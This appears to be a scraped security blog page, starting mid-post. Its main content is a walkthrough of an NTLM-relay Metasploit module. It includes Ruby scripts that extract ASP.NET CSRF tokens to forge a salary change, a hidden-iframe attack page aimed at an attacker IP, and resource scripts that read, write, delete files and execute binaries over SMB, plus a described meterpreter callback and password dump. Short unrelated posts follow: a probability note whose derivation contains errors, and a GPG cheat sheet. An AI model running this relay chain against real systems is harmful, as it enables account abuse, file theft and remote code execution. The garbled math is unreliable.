	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf" on the request that retrieved the relavent values
		if note.data[:SYNCID] == "csrf"
			print_status("Found GET request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1&__EVENTARGUMENT=Edit%243&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation)
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

extract2.rb is nearly identical, except the POST data needs our CSRF values and the requests we’re parsing are different (we have a separate syncid we’re looking for).

# cat extract_2.rb
#grab the request with the ID specified

new_salary = "-100"
victim = "EVIL%5Cmopey"

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf" on the request that retrieved the relavent values
		if note.data[:SYNCID] == "csrf2"
			print_status("Found Second request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1%24ctl05%24ctl00&__EVENTARGUMENT=&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation) + "&ctl00%24MainContent%24GridView1%24ctl05%24ctl02=" +
				victim + '&ctl00%24MainContent%24GridView1%24ctl05%24ctl03=' + new_salary
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

The HTTP_HEADERS options is easier to explain. In the file, it’s just a list of HTTP_HEADERS…

# cat headerfile
Content-Type: application/x-www-form-urlencoded

Lastly, I put all three requests in a nice rick roll package. This is the site the victim will visit with their browser in the final attack.

<iframe src="http://192.168.138.132:8080/grabtoken1" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/grabtoken2" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/csrf" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>

<h1>Never gonna Give you Up!!!</h1>
<iframe width="420" height="315" src="http://www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe>


Here’s the whole thing in action. In this video I fail the rickroll due to my lack of IE flash, but the attack works. Despite good CSRF protection, mopey’s salary is successfully modified by visiting a malicious website.

Yes, it’s kind of complicated to parse HTML and extract values, but that’s just the nature of the problem. I’ve done this several times. In this archive there’s a mediawiki POST that edits an NTLM authed page. It’s similar to above, but requires a multipart form and a authentication cookie (which you can use the headerfile option for). HTTP_ntlmrelay is designed to do one request at a time, but multiple requests can easily be stacked on the browser side (like I did here with the hidden iframes).

SMB File Operations

There’s (usually) no reason you can’t use a browser’s NTLM handshake to authenticate to an SMB share, and from there, all the regular file operations you’d expect should be possible. Because there’s no custom HTML to parse or anything, this is actually a lot simpler to demonstrate. The setup is the same as above, a fully patched browser client from one machine being relayed to a separate fully patched default win 2008R2 domain machine (mwebserver).

#This simple resource simply enums shares, reads, writes, ls, and pwn

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RPORT 445
#smb_enum
set RTYPE SMB_ENUM
set URIPATH smb_enum
run
#SMB_PUT
set RTYPE SMB_PUT
set URIPATH smb_put
set RURIPATH c$\\secret.txt
set PUTDATA "hi ima secret"
set VERBOSE true
run
#smb_ls
unset PUTDATA
set RTYPE SMB_LS
set URIPATH smb_ls
set RURIPATH c$\\
run
#smb_get
set RTYPE SMB_GET
set URIPATH smb_get
set RURIPATH c$\\secret.txt
run
#smb_rm
set RTYPE SMB_RM
set URIPATH smb_rm
set RURIPATH c$\\secret.txt
run

Another cool thing. With current attacks like the smb_relay module you pretty much need to be an admin, and that’s still true here if you want to start services. But any Joe that can authenticate might be able to write/read to certain places. Think about how corporate networks might do deployment with development boxes, distribute shared executables, transfer shares, etc and you might get the idea. Below I replace somebody’s winscp on their Desktop with something that has a winscp icon and just does a system call to calculator (this is from a different lab but the idea applies anywhere)

SMB Pwn

How does psexec work? Oh yeah, it uses SMB :) You astute folks may have known this all along, but showing this off to people… they’re just amazed at how pwned they can get by visiting a website.

This can be super simple. Here’s an example that tries to execute calc.exe. It’s flaky on 2008r2 because windows is trying to start calc as a service… but it still pretty much works if you refresh a few times.

#This simple resource simply executes calculator

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE SMB_PWN
set RPORT 445
set RURIPATH %SystemRoot%\\system32\\calc.exe
set URIPATH smb_pwn

MUCH more reliable is to create a service that has at least onstart, onstop methods. This next video has three requests, one to upload a malicious binary with smb_put, a second call to smb_pwn, and a third to remove the binary. This is similar to what the current metasploit smb_relay and psexec modules do automatically. Here I upload a meterpreter service binary that connects back to my stage 2, and then executes a packed wce to dump the user’s password in cleartext.

This is my favorite demo, because it shows the user’s cleartext passwords from just visiting a website or viewing an email.

Conclusions

So like I mentioned before, I have a tool arsenal thing next week at Blackhat, so that would be cool if people stopped by to chat. Also, at the time of this writing this hasn’t made it into Metasploit proper yet, but I hope it makes it eventually! Egypt gave me a bunch of good fixes to do. I’ve made most the changes, I just haven’t committed them yet (but I probably will tomorrow, barring earthquakes and whatnot).

Mitigations are a subject I don’t cover here. I think this deserves a post of its own, since misconceptions about relaying are so prevalent. Until then, this might be a good starting point: http://technet.microsoft.com/en-us/security/advisory/973811.

The square of random is less uniform (derr)

This is something obvious to statisticians but maybe less obvious to most programmers. I recently came across some code that essentially looks like this:

x = rand() #random number uniformly distributed between [0,1]
...
x= x**n #raise x to a power

The programer was for some reason assuming that x was still uniform between [0,1]. Of course, this isn’t the case. Although the domain is still between [0,1] the numbers will now be squished down closer to 0.

It is easy to analyze this with a change of variables.

The frequency distribution Fx(x) = P(X<=x)=x
Y=x^n
Fy(y) = P(Y<=y) = P(x^n<=y) = P(X<=y^(1/n) = y^(1/n) for 0<=y<=1
The density function is the derivitive
Fp(y)= (1/n)*y^-(1/n) = 1/(s*sqrt(y))

The graphs of the distributions look like this, first the one generated by rand, then one with n=2:

GPG Cheat Sheet

The gnu Privacy handbook has a ton of useful information, but I thought I’d make a quick reference for the gpg usage I use most. Especially because I was just an idiot and lost my gpg private key (though I do remember the passphrase) – this time there will be a backup!

List all keys

gpg –list-keys

print key to a file (mypublickey) – <keyid> is listed when you do list-keys

gpg -ao mypublickey.key –export <keyid>

show secret keys

gpg –list-secret-keys

backup secret keys

gpg -a –export-secret-keys <keyid> | gpg-aco myprivatkeyfile.key.gpg

Restoring the key

gpg –import {keyfile}

Restore an encrypted key

gpg –decrypt {privatekeyfile} | gpg –import

Sign a file

gpg –output doc.sig –sign doc

verify signature

gpg –output mydoc –decrypt doc.sig